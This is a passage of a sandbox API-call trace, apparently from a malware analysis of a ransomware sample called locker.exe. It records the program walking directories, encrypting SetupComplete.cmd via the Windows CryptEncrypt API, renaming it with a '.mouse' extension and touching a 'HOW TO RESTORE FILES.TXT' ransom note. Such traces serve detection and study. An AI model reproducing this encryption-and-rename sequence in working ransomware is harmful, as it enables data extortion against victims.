Size=0x30) returned 0x42bad8 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x42bad8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 39 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0198.163] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bb10 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", cchWideChar=39, lpMultiByteStr=0x42bb10, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 39 [0198.163] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bb10 | out: hHeap=0x3c0000) returned 1 [0198.163] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.163] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bbf0 | out: hHeap=0x3c0000) returned 1 [0198.163] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.163] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12af9d0, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\locker.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\locker.exe")) returned 0x22 [0198.163] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42b9f8 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".cmd", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr=".cmd", cchWideChar=4, lpMultiByteStr=0x12afc3c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".cmd", lpUsedDefaultChar=0x0) returned 4 [0198.163] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bad8 [0198.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0198.164] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0198.164] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$GetCurrent\\SafeOS", cchWideChar=21, lpMultiByteStr=0x43cad0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$GetCurrent\\SafeOS", lpUsedDefaultChar=0x0) returned 21 [0198.164] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bad8 | out: hHeap=0x3c0000) returned 1 [0198.164] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cc10 [0198.164] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bbf0 [0198.164] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cc10 | out: hHeap=0x3c0000) returned 1 [0198.164] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x30) returned 0x42bec8 [0198.164] AreFileApisANSI () returned 1 [0198.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bec8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 47 [0198.164] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x5e) returned 0x3ec6e8 [0198.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x42bec8, cbMultiByte=-1, lpWideCharStr=0x3ec6e8, cchWideChar=47 | out: lpWideCharStr="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT") returned 47 [0198.164] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\HOW TO RESTORE FILES.TXT" (normalized: "c:\\$getcurrent\\safeos\\how to restore files.txt"), fInfoLevelId=0x0, lpFileInformation=0x12afa6c | out: lpFileInformation=0x12afa6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x767ae577, ftCreationTime.dwHighDateTime=0x1d6ad29, ftLastAccessTime.dwLowDateTime=0x767ae577, ftLastAccessTime.dwHighDateTime=0x1d6ad29, ftLastWriteTime.dwLowDateTime=0x767d471e, ftLastWriteTime.dwHighDateTime=0x1d6ad29, nFileSizeHigh=0x0, nFileSizeLow=0x71)) returned 1 [0198.164] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.164] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bec8 | out: hHeap=0x3c0000) returned 1 [0198.164] GetFileAttributesExW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12afa04 | out: lpFileInformation=0x12afa04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133)) returned 1 [0198.166] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.166] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.166] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x133 [0198.166] CloseHandle (hObject=0x3bc) returned 1 [0198.166] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.166] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4351b0 [0198.166] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4351b0 | out: hHeap=0x3c0000) returned 1 [0198.166] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435050 [0198.166] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435050 | out: hHeap=0x3c0000) returned 1 [0198.166] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.166] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d920 [0198.166] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d920, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.166] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d920 | out: hHeap=0x3c0000) returned 1 [0198.166] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x4351b0 [0198.167] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc [0198.167] GetFileSize (in: hFile=0x3bc, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x133 [0198.167] CloseHandle (hObject=0x3bc) returned 1 [0198.167] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4351b0 | out: hHeap=0x3c0000) returned 1 [0198.167] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419de8 [0198.168] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x8) returned 0x419c98 [0198.169] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x12af700, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3bc [0198.169] GetFileType (hFile=0x3bc) returned 0x1 [0198.169] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x153) returned 0x3e40f0 [0198.169] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x153) returned 0x440288 [0198.169] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x1000) returned 0x43e570 [0198.169] ReadFile (in: hFile=0x3bc, lpBuffer=0x43e570, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12af714, lpOverlapped=0x0 | out: lpBuffer=0x43e570*, lpNumberOfBytesRead=0x12af714*=0x133, lpOverlapped=0x0) returned 1 [0198.171] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x133, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.171] GetVersion () returned 0x23f00206 [0198.171] CryptAcquireContextA (in: phProv=0x12af890, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12af890*=0x40aa20) returned 1 [0198.174] CryptImportKey (in: hProv=0x40aa20, pbData=0x12af8bc, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x12af894 | out: phKey=0x12af894*=0x4329f8) returned 1 [0198.174] CryptSetKeyParam (hKey=0x4329f8, dwParam=0x4, pbData=0x12af888*=0x2, dwFlags=0x0) returned 1 [0198.174] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x140) returned 0x4403e8 [0198.174] CryptEncrypt (in: hKey=0x4329f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4403e8*, pdwDataLen=0x12af88c*=0x133, dwBufLen=0x140 | out: pbData=0x4403e8*, pdwDataLen=0x12af88c*=0x140) returned 1 [0198.174] CryptDestroyKey (hKey=0x4329f8) returned 1 [0198.174] CryptReleaseContext (hProv=0x40aa20, dwFlags=0x0) returned 1 [0198.174] SetFilePointerEx (in: hFile=0x3bc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12af758 | out: lpNewFilePointer=0x0) returned 1 [0198.174] GetLastError () returned 0x0 [0198.174] SetLastError (dwErrCode=0x0) [0198.174] GetLastError () returned 0x0 [0198.174] SetLastError (dwErrCode=0x0) [0198.174] GetLastError () returned 0x0 [0198.174] SetLastError (dwErrCode=0x0) [0198.175] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4403e8 | out: hHeap=0x3c0000) returned 1 [0198.175] WriteFile (in: hFile=0x3bc, lpBuffer=0x43e570*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x12af7c8, lpOverlapped=0x0 | out: lpBuffer=0x43e570*, lpNumberOfBytesWritten=0x12af7c8*=0x140, lpOverlapped=0x0) returned 1 [0198.175] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43e570 | out: hHeap=0x3c0000) returned 1 [0198.175] CloseHandle (hObject=0x3bc) returned 1 [0198.176] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3e40f0 | out: hHeap=0x3c0000) returned 1 [0198.176] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x440288 | out: hHeap=0x3c0000) returned 1 [0198.176] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x50) returned 0x435208 [0198.176] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0198.176] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x10) returned 0x43d908 [0198.176] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x12af898, cbMultiByte=-1, lpWideCharStr=0x43d908, cchWideChar=7 | out: lpWideCharStr=".mouse") returned 7 [0198.176] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43d908 | out: hHeap=0x3c0000) returned 1 [0198.176] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x76) returned 0x4263a8 [0198.176] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x435208 | out: hHeap=0x3c0000) returned 1 [0198.176] MoveFileExW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.mouse" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.mouse"), dwFlags=0x2) returned 1 [0198.177] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x60) returned 0x3ec6e8 [0198.177] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.mouse" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.mouse"), dwDesiredAccess=0x100, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0x3bc [0198.177] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x12af840 | out: lpSystemTimeAsFileTime=0x12af840) [0198.177] SetFileTime (hFile=0x3bc, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x12af888) returned 1 [0198.177] CloseHandle (hObject=0x3bc) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x3ec6e8 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x4263a8 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419c98 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x419de8 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42bbf0 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x42b9f8 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccd8 | out: hHeap=0x3c0000) returned 1 [0198.178] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x434ff8 | out: hHeap=0x3c0000) returned 1 [0198.178] FindNextFileW (in: hFindFile=0x432df8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12af8a8, ftCreationTime.dwLowDateTime=0x3251e4, ftCreationTime.dwHighDateTime=0x12af960, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x12afa30, ftLastWriteTime.dwLowDateTime=0x36d17a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x32ba97, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="", cAlternateFileName="茾3俸C齃Īᓮ2俸CP")) returned 0 [0198.178] GetLastError () returned 0x12 [0198.178] FindClose (in: hFindFile=0x432df8 | out: hFindFile=0x432df8) returned 1 [0198.178] FindNextFileW (in: hFindFile=0x432cf8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x12af8a8, ftCreationTime.dwLowDateTime=0x3251e4, ftCreationTime.dwHighDateTime=0x12af960, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x12afa30, ftLastWriteTime.dwLowDateTime=0x36d17a, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x32ba97, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="", cAlternateFileName="茾3俸C齃Īᓮ2俸CP")) returned 0 [0198.178] GetLastError () returned 0x12 [0198.178] FindClose (in: hFindFile=0x432cf8 | out: hFindFile=0x432cf8) returned 1 [0198.179] FindNextFileW (in: hFindFile=0x432bb8, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0198.179] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43ccb0 [0198.179] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43ccb0 | out: hHeap=0x3c0000) returned 1 [0198.179] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbc0 [0198.179] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="$Recycle.Bin", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="$Recycle.Bin", cchWideChar=12, lpMultiByteStr=0x12afcd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$Recycle.Bin", lpUsedDefaultChar=0x0) returned 12 [0198.179] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x12afcc0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin", lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x12afc3c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin", lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x12afc24, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin", lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0198.179] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin", cchWideChar=15, lpMultiByteStr=0x12afbdc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin", lpUsedDefaultChar=0x0) returned 15 [0198.179] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0198.179] FindFirstFileExW (in: lpFileName="C:\\$Recycle.Bin\\*", fInfoLevelId=0x1, lpFindFileData=0x12af88c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x12af88c) returned 0x432a38 [0198.180] FindNextFileW (in: hFindFile=0x432a38, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="..", cAlternateFileName="")) returned 1 [0198.180] FindNextFileW (in: hFindFile=0x432a38, lpFindFileData=0x12af88c | out: lpFindFileData=0x12af88c*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xae73cae3, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x434ff8, dwReserved1=0x133, cFileName="S-1-5-18", cAlternateFileName="")) returned 1 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cd00 [0198.180] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cd00 | out: hHeap=0x3c0000) returned 1 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x40) returned 0x436ca0 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb48 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="S-1-5-18", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="S-1-5-18", cchWideChar=8, lpMultiByteStr=0x12afcd8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="S-1-5-18", lpUsedDefaultChar=0x0) returned 8 [0198.180] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb48 | out: hHeap=0x3c0000) returned 1 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cad0 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x43cad0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 24 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb20 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x43cb20, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 24 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cb48 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x43cb48, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 24 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0198.180] RtlAllocateHeap (HeapHandle=0x3c0000, Flags=0x0, Size=0x20) returned 0x43cbc0 [0198.180] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x80, lpWideCharStr="C:\\$Recycle.Bin\\S-1-5-18", cchWideChar=24, lpMultiByteStr=0x43cbc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\$Recycle.Bin\\S-1-5-18", lpUsedDefaultChar=0x0) returned 24 [0198.181] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cbc0 | out: hHeap=0x3c0000) returned 1 [0198.181] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb48 | out: hHeap=0x3c0000) returned 1 [0198.181] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cb20 | out: hHeap=0x3c0000) returned 1 [0198.181] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x43cad0 | out: hHeap=0x3c0000) returned 1 [0198.247] HeapFree (in: hHeap=0x3c0000, dwFlags=0x0, lpMem=0x436ca0 | out: 